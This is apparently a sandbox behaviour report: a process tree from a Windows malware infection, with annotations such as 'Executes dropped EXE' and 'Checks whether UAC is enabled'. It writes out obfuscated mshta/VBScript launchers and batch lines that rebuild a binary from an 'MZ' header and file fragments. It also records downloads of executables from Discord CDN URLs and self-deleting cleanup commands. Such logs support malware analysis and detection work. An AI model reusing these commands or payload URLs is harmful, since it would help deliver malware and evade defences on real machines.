C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2572 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=1640 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3240 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=3732 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=1956 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2364 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2468 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\daAvGFmInLP9llVHowvdT1JG.exe"C:\Users\Admin\Pictures\Adobe Films\daAvGFmInLP9llVHowvdT1JG.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe"C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im NM7CXeS45IfHCxjP7ALOrXWA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NM7CXeS45IfHCxjP7ALOrXWA.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\qCbGN2Tg1ZNb43oxn6V5pPXu.exe"C:\Users\Admin\Pictures\Adobe Films\qCbGN2Tg1ZNb43oxn6V5pPXu.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jv3ip_oP7Js5FEg88aQhg9IS.exe"C:\Users\Admin\Pictures\Adobe Films\jv3ip_oP7Js5FEg88aQhg9IS.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\lng6k_fhu4_efH3KoMaBWcns.exe"C:\Users\Admin\Pictures\Adobe Films\lng6k_fhu4_efH3KoMaBWcns.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Elt_1hjZ7Cc_SE7oikY5wVyf.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"11⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\pyh7zIKR9UZEXCtS7wlOT1BT.exe"C:\Users\Admin\Pictures\Adobe Films\pyh7zIKR9UZEXCtS7wlOT1BT.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2886257.exe"C:\Users\Admin\AppData\Roaming\2886257.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6475169.exe"C:\Users\Admin\AppData\Roaming\6475169.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3603410.exe"C:\Users\Admin\AppData\Roaming\3603410.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\104049.exe"C:\Users\Admin\AppData\Roaming\104049.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5339904.exe"C:\Users\Admin\AppData\Roaming\5339904.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\8535876.exe"C:\Users\Admin\AppData\Roaming\8535876.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "6s2iqIIuSomyLF6cFihESuip.exe" -F9⤵
- Checks processor information in registry
- Enumerates system info in registry
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\ZNjEhM7gVrAAxuwEiyqOJ34t.exe"C:\Users\Admin\Pictures\Adobe Films\ZNjEhM7gVrAAxuwEiyqOJ34t.exe"6⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee09⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e9010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1764,4329137705519038288,10573143780041811623,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw132_140769999" --mojo-platform-channel-handle=1776 /prefetch:89⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 584 -ip 5841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 852 -ip 8521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1416 -ip 14161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\31AD.bat "C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe""1⤵
-
C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899625782291361795/899625800544964668/18.exe" "18.exe" "" "" "" "" "" ""2⤵
-
C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899625782291361795/899625964001193984/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""2⤵
-
C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "" "" "" "" "" "" "" "" ""2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\21799\Transmissibility.exeTransmissibility.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\21799\18.exe18.exe2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4516 -ip 45161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 404 -p 5232 -ip 52321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1248 -ip 12481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2672 -ip 26721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3056 -ip 30561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1452 -ip 14521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3700 -ip 37001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5856 -ip 58561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5492 -ip 54921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5688 -ip 56881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5204 -ip 52041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2964 -ip 29641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-RVMGH.tmp\pXqJ9z4kMcKRrHcFa0zq6bMh.tmp"C:\Users\Admin\AppData\Local\Temp\is-RVMGH.tmp\pXqJ9z4kMcKRrHcFa0zq6bMh.tmp" /SL5="$3031E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-CE4L7.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-CE4L7.tmp\ShareFolder.exe" /S /UID=27092⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\47-1a9db-5d6-79db1-6904501d70c61\SHexalyshilo.exe"C:\Users\Admin\AppData\Local\Temp\47-1a9db-5d6-79db1-6904501d70c61\SHexalyshilo.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exeC:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exe5⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee08⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d0,0x1d4,0x1d8,0x1ac,0x1dc,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e909⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,13431303747690812435,3682714545647626427,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5572_2125029425" --mojo-platform-channel-handle=1956 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1608,13431303747690812435,3682714545647626427,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5572_2125029425" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:28⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exe /eufive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe /qn CAMPAIGN="654" & exit4⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exeC:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe /qn CAMPAIGN="654"5⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634304480 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exeC:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahs0x1ga.rs1\customer51.exe & exit4⤵
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
-
